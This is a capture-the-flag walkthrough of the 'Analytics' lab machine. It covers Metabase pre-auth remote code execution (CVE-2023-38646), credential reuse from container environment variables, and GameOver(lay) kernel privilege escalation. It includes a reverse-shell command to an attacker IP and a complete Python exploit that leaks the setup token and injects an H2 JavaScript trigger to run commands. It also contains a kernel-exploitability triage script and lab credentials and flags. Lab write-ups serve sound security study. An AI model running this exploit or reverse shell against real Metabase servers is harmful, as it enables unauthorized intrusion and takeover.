Analytics - Walkthrough

Analytics is an easy-difficulty Linux machine exposing HTTP and SSH. Enumeration of the website reveals a Metabase instance vulnerable to the pre-authentication remote code execution bug CVE-2023-38646, which gives a foothold inside a Docker container. Environment variables in that container hold credentials that also work for SSH on the host. Post-exploitation enumeration shows that the host kernel is vulnerable to GameOver(lay), which yields root privileges.

Enumeration

We begin with an Nmap scan to identify open services:

sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn --disable-arp-ping 10.10.11.233 -oG allPorts

The scan reveals:

PORT    STATE  SERVICE
22/tcp  open   ssh
80/tcp  open   http

A targeted scan provides more details:

sudo nmap -p22,80 -sCV 10.10.11.233 -oN targeted
  • SSH → OpenSSH 8.9p1 Ubuntu 3ubuntu0.4
  • HTTP → nginx 1.18.0 (Ubuntu)

We add the hostname to /etc/hosts:

echo "10.10.11.233 analytical.htb data.analytical.htb" | sudo tee -a /etc/hosts

Browsing the site reveals a Metabase login page, served from data.analytical.htb.

Foothold

Metabase releases prior to the July 2023 fixes (0.46.6.1 and the corresponding backports) are vulnerable to pre-auth RCE (CVE-2023-38646). Two weaknesses combine: the unauthenticated /api/session/properties endpoint leaks the setup token, which should only exist before the instance is configured, and /api/setup/validate accepts that token to test an arbitrary database connection, including an H2 JDBC string carrying SQL that creates a JavaScript trigger. We retrieve the setup token first:

curl -s http://data.analytical.htb/api/session/properties | jq -r '.["setup-token"]'

Token: 249fa03d-fd94-4d5b-b94f-b4ebf3df681f

We exploit it with a public proof-of-concept script (main.py here), passing the token and a command that connects back to our netcat listener on 10.10.14.248:5000:

python3 main.py -u http://data.analytical.htb -t 249fa03d-fd94-4d5b-b94f-b4ebf3df681f -c "nc 10.10.14.248 5000 -e bash"
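To make the black-box PoC above less of a mystery, here is the request chain behind CVE-2023-38646 as an added example; it is not the walkthrough's main.py and not Metabase code. It reads the leaked setup token from /api/session/properties, then posts to /api/setup/validate an H2 JDBC connection string whose escaped semicolon smuggles a CREATE TRIGGER with a JavaScript body into the SET statements H2 runs on connect. The zip:/app/metabase.jar!/sample-database.db path is the jar location used by public PoCs for the official Docker image; the function and constant names and the sample properties JSON are this example's own, and only exploit() touches the network.

```python
"""Added example: the request chain behind CVE-2023-38646 (Metabase pre-auth RCE).

This is not the walkthrough's main.py and not Metabase code. Only exploit()
touches the network, and only when it is called explicitly.
"""
import base64
import json
import urllib.error
import urllib.request

# Real Metabase API paths; the constant names are this example's own.
PROPERTIES_PATH = "/api/session/properties"   # leaks setup-token, unauthenticated
VALIDATE_PATH = "/api/setup/validate"         # accepts that token to "test" a DB connection

# Constructed sample of the properties response (trimmed to the field we need).
SAMPLE_PROPERTIES = '{"setup-token": "249fa03d-fd94-4d5b-b94f-b4ebf3df681f", "engines": {}}'


def extract_setup_token(properties_json: str) -> str:
    """Read setup-token from the /api/session/properties body, i.e. the field the
    walkthrough pulls with jq. Raises when the instance no longer exposes it
    (patched, or setup completed and the token cleared)."""
    token = json.loads(properties_json).get("setup-token")
    if not token:
        raise ValueError("setup-token not exposed; instance is patched or not vulnerable")
    return token


def shell_command_for_exec(cmd: str) -> str:
    """java.lang.Runtime.exec(String) splits its argument on whitespace, so the
    third token (the bash -c script) must contain no spaces: base64 the real
    command and let bash brace expansion supply the spaces."""
    b64 = base64.b64encode(cmd.encode()).decode()
    return "bash -c {echo,%s}|{base64,-d}|{bash,-i}" % b64


def build_h2_connection_string(cmd: str) -> str:
    """H2 JDBC settings string. H2 applies each setting by executing
    'SET <name> <value>' as SQL; the escaped semicolon (\\;) keeps
    'CREATE TRIGGER ...' inside the TRACE_LEVEL_SYSTEM_OUT value, so a second
    statement runs and creates a JavaScript trigger. Metabase's connection test
    reads INFORMATION_SCHEMA.TABLES, which fires the trigger and runs cmd.
    The zip: path is the jar location in the official Docker image."""
    return (
        "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;"
        "TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnShell BEFORE SELECT ON "
        "INFORMATION_SCHEMA.TABLES AS $$//javascript\n"
        "java.lang.Runtime.getRuntime().exec('%s')\n$$--=x"
        % shell_command_for_exec(cmd)
    )


def build_validate_body(token: str, cmd: str) -> dict:
    """JSON body for POST /api/setup/validate; engine h2 is what routes the
    connection string above to the H2 driver."""
    return {
        "token": token,
        "details": {
            "is_on_demand": False,
            "is_full_sync": False,
            "is_sample": False,
            "cache_ttl": None,
            "refingerprint": False,
            "auto_run_queries": True,
            "schedules": {},
            "details": {
                "db": build_h2_connection_string(cmd),
                "advanced-options": False,
                "ssl": True,
            },
            "name": "x",
            "engine": "h2",
        },
    }


def exploit(base_url: str, cmd: str, timeout: float = 10.0) -> int:
    """Fetch the token, then post the payload. Returns the HTTP status of the
    validate call; a 4xx is expected, the command has already run by then."""
    with urllib.request.urlopen(base_url + PROPERTIES_PATH, timeout=timeout) as r:
        token = extract_setup_token(r.read().decode())
    req = urllib.request.Request(
        base_url + VALIDATE_PATH,
        data=json.dumps(build_validate_body(token, cmd)).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as r:
            return r.status
    except urllib.error.HTTPError as e:
        return e.code


if __name__ == "__main__":
    import sys
    # e.g. python3 metabase_h2_rce.py http://data.analytical.htb "nc 10.10.14.248 5000 -e bash"
    print(exploit(sys.argv[1].rstrip("/"), sys.argv[2]))
```

The defensive takeaway is in extract_setup_token: on a patched or fully set-up instance the token is absent, and everything downstream stops there, which is also the quickest way to confirm a fix landed.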

We land in a Docker container rather than on the host. Its environment variables (NUL-separated in /proc/self/environ) contain credentials:

cat /proc/self/environ
  • Username → metalytics
  • Password → An4lytics_ds20223#

The same credentials are reused for SSH on the host, where we capture the user flag:

ssh metalytics@10.10.11.233
cat user.txt

User flag: 749da6196e7fecfe5cf19f2f85e1f58e

Privilege Escalation

We check the kernel version:

uname -a
Linux analytics 6.2.0-25-generic #25~22.04.2-Ubuntu SMP PREEMPT_DYNAMIC Wed Jun 28 09:55:23 UTC 2 x86_64

This is an Ubuntu 22.04 HWE kernel (6.2.0-25) that predates the fix for GameOver(lay) (CVE-2023-2640 and CVE-2023-32629). Ubuntu's OverlayFS carried patches that let a file's security.capability xattr be copied up from a mount created inside an unprivileged user namespace without the usual permission check, so an unprivileged user can produce a binary whose CAP_SETUID is honoured in the host namespace. The public one-line PoC (wrapped in exploit.sh here) does exactly that and drops into a root shell; it needs unprivileged user namespaces enabled, which is Ubuntu's default:

./exploit.sh
[+] You should be root now
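Before reaching for that PoC on another host, it helps to check the two preconditions it depends on. The following Python is an added example, not the walkthrough's exploit.sh: it parses an Ubuntu kernel string such as the uname output above, compares the ABI number against the first fixed one for its series, and checks that unprivileged user namespaces are available. The FIXED_ABI table is this example's assumption, taken from my reading of Ubuntu's security notices for these CVEs, and should be confirmed against the Ubuntu CVE tracker before trusting a "patched" verdict; the function names are also mine.

```python
"""Added example: triage before reaching for the GameOver(lay) PoC
(CVE-2023-2640 / CVE-2023-32629).

This is not the walkthrough's exploit.sh; it only decides whether running it is
worth a try. FIXED_ABI is an assumption from my reading of Ubuntu's security
notices for these CVEs; confirm it against the Ubuntu CVE tracker.
"""
import re
from typing import Optional, Tuple

# (upstream major, minor) -> first Ubuntu ABI number carrying the fix (assumption).
FIXED_ABI = {
    (6, 2): 26,   # linux-hwe-6.2 on 22.04; the Analytics host runs 6.2.0-25
    (5, 15): 78,  # 22.04 GA kernel (generic/lowlatency); cloud flavours use a 1xxx ABI series
}

# Ubuntu kernel release strings look like 6.2.0-25-generic or 5.15.0-1040-aws.
UBUNTU_RELEASE_RE = re.compile(r"\b(\d+)\.(\d+)\.(\d+)-(\d+)-([a-z0-9-]+)\b")


def parse_ubuntu_kernel(uname: str) -> Optional[Tuple[Tuple[int, int], int, str]]:
    """Accept `uname -r` or full `uname -a` output; return ((major, minor), abi, flavour),
    or None when the string is not in Ubuntu's <version>-<abi>-<flavour> form."""
    m = UBUNTU_RELEASE_RE.search(uname)
    if not m:
        return None
    major, minor, _patch, abi, flavour = m.groups()
    return (int(major), int(minor)), int(abi), flavour


def kernel_predates_fix(uname: str) -> Optional[bool]:
    """True if the ABI is older than the fixed one for its series, False if fixed,
    None if we cannot tell (non-Ubuntu kernel, cloud flavour, or series not in FIXED_ABI)."""
    parsed = parse_ubuntu_kernel(uname)
    if parsed is None:
        return None
    series, abi, _flavour = parsed
    if abi >= 1000:
        return None  # cloud kernels (aws, azure, gcp, ...) number their ABI separately
    fixed = FIXED_ABI.get(series)
    if fixed is None:
        return None
    return abi < fixed  # integer compare, so 9 < 10 and 25 < 26


def userns_available(userns_clone: Optional[str], max_user_namespaces: str) -> bool:
    """The PoC needs `unshare -rm`, i.e. an unprivileged user namespace.
    kernel.unprivileged_userns_clone is Ubuntu/Debian-specific (absent means
    allowed); user.max_user_namespaces == 0 disables them on any kernel."""
    if userns_clone is not None and userns_clone.strip() == "0":
        return False
    return int(max_user_namespaces.strip()) > 0


def triage(uname: str, userns_clone: Optional[str], max_user_namespaces: str) -> str:
    """One of: try-poc, patched, userns-disabled, unknown-kernel."""
    predates = kernel_predates_fix(uname)
    if predates is None:
        return "unknown-kernel"
    if not predates:
        return "patched"
    if not userns_available(userns_clone, max_user_namespaces):
        return "userns-disabled"
    return "try-poc"


def read_proc(path: str) -> Optional[str]:
    """Return a /proc/sys file's content, or None when it does not exist."""
    try:
        with open(path) as f:
            return f.read()
    except OSError:
        return None


if __name__ == "__main__":
    import platform
    print(triage(
        platform.release(),  # same string as `uname -r`
        read_proc("/proc/sys/kernel/unprivileged_userns_clone"),
        read_proc("/proc/sys/user/max_user_namespaces") or "0",
    ))
```

A "patched" or "unknown-kernel" verdict is a reason to read the advisory, not proof of safety; the table only covers the series the page is about.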

Root flag obtained:

cat /root/root.txt

Root flag: 413ac3e565a80a91ee2219266dbc63ce